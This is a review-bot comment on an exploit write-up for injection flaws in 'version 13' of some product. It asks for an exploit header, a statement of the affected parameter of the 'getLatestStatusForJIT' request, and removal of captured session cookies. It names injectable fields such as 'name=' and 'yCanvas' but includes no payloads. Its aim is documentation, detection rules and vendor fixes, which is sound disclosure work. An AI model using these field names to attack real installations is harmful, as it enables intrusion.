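Review bot: this file carries no `# Exploit Title / Author / Date / Vendor / Version` header block of the kind 43128.txt has, so the author (Cody Sixteen) and date (2017-11-07) exist only in the CSV row; add the header together with the tested build and whether the vendor was notified, since "version 13" alone does not tell a reader which builds are affected or fixed. PoC 1 and PoC 2 name the injected field (`name=` and the `viewProps` `yCanvas` value) but PoC 3 names none; state which parameter of the `method=getLatestStatusForJIT` request is affected (`haid`, `viewid`, `currentime` or `resourceIDs`), otherwise the third request cannot be turned into a detection rule or a vendor regression test. Also strip the captured session material before publishing: the three `JSESSIONID_APM_9090` values and the `liveapm-_zldp` / `liveapm-_zldt` cookies are identifiers from the test host and add nothing to the write-up.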